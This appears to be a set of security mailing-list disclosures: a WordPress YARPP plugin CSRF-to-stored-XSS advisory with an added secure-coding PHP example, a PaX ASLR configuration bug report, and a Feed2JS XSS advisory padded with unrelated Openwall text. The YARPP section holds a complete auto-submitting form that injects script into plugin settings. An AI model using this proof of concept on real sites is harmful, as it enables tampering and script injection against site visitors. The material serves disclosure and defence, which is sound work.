Vulnerability Scope
XSS
RCE (http://research.evex.pw/?vuln=14)

Authorization Required:
None

Proof of Concept:
<body onload="document.getElementById('payload_form').submit()">
<form id="payload_form" action="http://wpsite.com/wp-admin/options-general.php?page=yarpp" method="POST">
<input type='hidden' name='recent_number' value='12'>
<input type='hidden' name='recent_units' value='month'>
<input type='hidden' name='threshold' value='5'>
<input type='hidden' name='weight[title]' value='no'>
<input type='hidden' name='weight[body]' value='no'>
<input type='hidden' name='tax[category]' value='no'>
<input type='hidden' name='tax[post_tag]' value='consider'>
<input type='hidden' name='auto_display_post_types[post]' value='on'>
<input type='hidden' name='auto_display_post_types[page]' value='on'>
<input type='hidden' name='auto_display_post_types[attachment]' value='on'>
<input type='hidden' name='auto_display_archive' value='true'>
<input type='hidden' name='limit' value='1'>
<input type='hidden' name='use_template' value='builtin'>
<input type='hidden' name='thumbnails_heading' value='Related posts:'>
<input type='hidden' name='no_results' value='<script>alert(1);</script>'>
<input type='hidden' name='before_related' value='<script>alert(1);</script><li>'>
<input type='hidden' name='after_related' value='</li>'>
<input type='hidden' name='before_title' value='<script>alert(1);</script><li>'>
<input type='hidden' name='after_title' value='</li>'>
<input type='hidden' name='show_excerpt' value='true'>
<input type='hidden' name='excerpt_length' value='10'>
<input type='hidden' name='before_post' value='+<small>'>
<input type='hidden' name='after_post' value='</small>'>
<input type='hidden' name='order' value='post_date ASC'>
<input type='hidden' name='promote_yarpp' value='true'>
<input type='hidden' name='rss_display' value='true'>
<input type='hidden' name='rss_limit' value='1'>
<input type='hidden' name='rss_use_template' value='builtin'>
<input type='hidden' name='rss_thumbnails_heading' value='Related posts:'>
<input type='hidden' name='rss_no_results' value='No Results'>
<input type='hidden' name='rss_before_related' value='<li>'>
<input type='hidden' name='rss_after_related' value='</li>'>
<input type='hidden' name='rss_before_title' value='<li>'>
<input type='hidden' name='rss_after_title' value='</li>'>
<input type='hidden' name='rss_show_excerpt' value='true'>
<input type='hidden' name='rss_excerpt_length' value='10'>
<input type='hidden' name='rss_before_post' value='+<small>'>
<input type='hidden' name='rss_after_post' value='</small>'>
<input type='hidden' name='rss_order' value='score DESC'>
<input type='hidden' name='rss_promote_yarpp' value='true'>
<input type='hidden' name='update_yarpp' value='Save Changes'>
</form>
</body>

Fix:
No Fix Available at The Moment.

Timeline:
Notified Vendor - No Reply
Notified Vendor Again - No Reply
Publish Disclosure

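As an added illustration of the two defences the post says are missing (it is not YARPP's own code, and the option names, function names and the 'yarpp_update_settings' nonce action are assumed for the example), this is a WordPress settings handler in its unprotected form next to a hardened one that checks a nonce and capability and strips script from the HTML-bearing option before saving it:

```php
<?php
// Added example, not code from YARPP or the advisory. Relies on core
// WordPress functions (wp_nonce_field, check_admin_referer,
// current_user_can, wp_unslash, wp_kses_post, update_option, wp_die);
// the handler/option names below are invented for illustration.

// Unprotected pattern: any POST reaching the settings page is saved, so a
// form auto-submitted from another site by a logged-in admin is accepted,
// and raw markup stored in 'no_results' is later echoed on every post page.
function example_yarpp_save_settings_vulnerable() {
    if ( isset( $_POST['update_yarpp'] ) ) {
        update_option( 'example_yarpp_no_results', $_POST['no_results'] );
    }
}

// Hardened pattern, part 1: the settings form carries a nonce that is bound
// to the current user and session, which a cross-site page cannot obtain.
function example_yarpp_render_settings_form() {
    echo '<form method="post">';
    wp_nonce_field( 'yarpp_update_settings', 'yarpp_nonce' );
    echo '<input type="text" name="no_results" />';
    echo '<input type="submit" name="update_yarpp" value="Save Changes" />';
    echo '</form>';
}

// Hardened pattern, part 2: verify the nonce and the capability before any
// write, then restrict the HTML-bearing option to post-safe markup.
function example_yarpp_save_settings_hardened() {
    if ( ! isset( $_POST['update_yarpp'] ) ) {
        return;
    }
    // Dies with WordPress's "link has expired" page when the nonce is
    // missing, forged or issued to a different user: the CSRF form fails here.
    check_admin_referer( 'yarpp_update_settings', 'yarpp_nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }

    // The nonce stops the cross-site submission; it does not make stored
    // markup safe. wp_kses_post() keeps formatting tags such as <li> and
    // <small> but removes <script> and on* event handlers, so an admin who is
    // tricked into saving the payload above still gets no script stored.
    $no_results = wp_kses_post( wp_unslash( $_POST['no_results'] ) );
    update_option( 'example_yarpp_no_results', $no_results );
}
```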


Re: [FD] AMD Bulldozer Linux ASLR weakness: Reducing entropy by 87.5%

2015-05-08 Thread Hector Marco-Gisbert

Hi,

The PaX solution actually has 16 random bits for mmap objects on 32-bit systems on
non-affected systems. On affected systems the random bits are degraded to 2^13.

Unfortunately, depending on the PaX kernel configuration sequence, some features
may not be enabled. There are sequences of PaX configuration which do not give
the expected result.

The configuration sequence that results in a misconfigured system is:

1.- Starting from a clean Linux tree with PaX patch applied.

2.- Enable the Grsecurity option (which sets Security Method to
Custom) and compile & test:
Observed mmap entropy: 2^5 (as expected).

3.- Then set Security Method to Automatic (which sets Required
Priorities to Performance) and compile & test:

Observed mmap entropy: 2^5.

4.- Last test: select Security on the Required Priorities option and
compile & test:
Observed mmap entropy: 2^5.

5.- At this point, it seems that the Required Priorities option has no
effect, that is, switching from Performance to Security or the other way
around (as many times as desired) does not enable/disable the expected features,
including the mmap randomization.

If steps 2 and 3, or 2 and 4 are configured at once (without exiting from the
menuconfig), then the system gets properly configured.


It seems that something in the PaX Kconfig files is not properly done. Could
anyone check it? So, if you are using PaX, it is worth ensuring that you are not
losing any PaX feature.


--
Hector Marco-Gisbert @ http://hmarco.org/
Cyber Security Researcher @ http://cybersecurity.upv.es
Universitat Politècnica de València (Spain)


[FD] Feed2JS v1.7 XSS (Cross-site Scripting) Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*Feed2JS v1.7 XSS (Cross-site Scripting) Web Security Vulnerabilities*


Exploit Title: Feed2JS v1.7 magpie_debug.php? url parameter XSS Security
Vulnerabilities
Product: Feed2JS
Vendor: feed2js.org
Vulnerable Versions: v1.7
Tested Version: v1.7
Advisory Publication: May 09, 2015
Latest Update: May 09, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Jing Wang [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)




*Proposition Details:*


*(1) Vendor & Product Description:*


*Vendor:*
feed2js.org


*Product & Vulnerable Versions:*
Feed2JS
v1.7


*Vendor URL & Download:*
Feed2JS can be downloaded from here,
https://feed2js.org/index.php?s=download


*Source code:*
http://www.gnu.org/licenses/gpl.html


*Product Introduction Overview:*
What is Feed to JavaScript? An RSS Feed is a dynamically generated
summary (in XML format) of information or news published on other web
sites- so when the published RSS changes, your web site will be
automatically changed too. It is a rather simple technology that allows
you, the humble web page designer, to have this content displayed in your
own web page, without having to know a lick about XML! Think of it as a box
you define on your web page that is able to update itself, whenever the
source of the information changes, your web page does too, without you
having to do a single thing to it. This Feed2JS web site (new and
improved!) provides you a free service that can do all the hard work for
you-- in 3 easy steps:
Find the RSS source, the web address for the feed.
Use our simple tool to build the JavaScript command that will display it
Optionally style it up to look pretty.

Please keep in mind that feeds are cached on our site for 60 minutes, so if
you add content to your RSS feed, the updates will take at least an hour to
appear in any other web site using Feed2JS to display that feed. To run
these scripts, you need a web server capable of running PHP which is rather
widely available (and free). You will need to FTP files to your server,
perhaps change permissions, and make some basic edits to configure it for
your system. I give you the code, getting it to work is on your shoulders.
I will try to help, but cannot always promise answers.




*(2) Vulnerability Details:*
Feed2JS web application has a computer security bug problem. It can be
exploited by stored XSS attacks. This may allow a remote attacker to create
a specially crafted request that would execute arbitrary script code in a
user's browser session within the trust relationship between their browser
and the server.

Several other Feed2JS products 0-day vulnerabilities have been found by
some other bug hunter researchers before. Feed2JS has patched some of them.
Openwall software releases and other related files are also available from
the Openwall file archive and its mirrors. You are encouraged to use the
mirrors, but be sure to verify the signatures on software you download. The
more experienced users and software developers may use our CVSweb server to
browse through the source code for most pieces of Openwall software along
with revision history information for each source file. We publish
articles, make presentations, and offer professional services. Openwall
has published suggestions, advisories, solutions details related to XSS
vulnerabilities.


*(2.1)* The first programming code flaw occurs at url parameter in
magpie_debug.php? page.





*References:*
http://www.tetraph.com/security/xss-vulnerability/feed2js-v1-7-xss/
http://securityrelated.blogspot.com/2015/05/feed2js-v17-xss-cross-site-scripting.html
http://www.inzeed.com/kaleidoscope/computer-web-security/feed2js-v1-7-xss/
https://vulnerabilitypost.wordpress.com/2015/05/08/feed2js-v1-7-xss/
http://whitehatpost.blog.163.com/blog/static/24223205420154810359682/
https://progressive-comp.com/?l=full-disclosure&m=142907534026807&w=2
https://www.bugscan.net/#!/x/21291
http://bluereader.org/article/27452996
http://lists.openwall.net/full-disclosure/2015/04/15/4




--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing
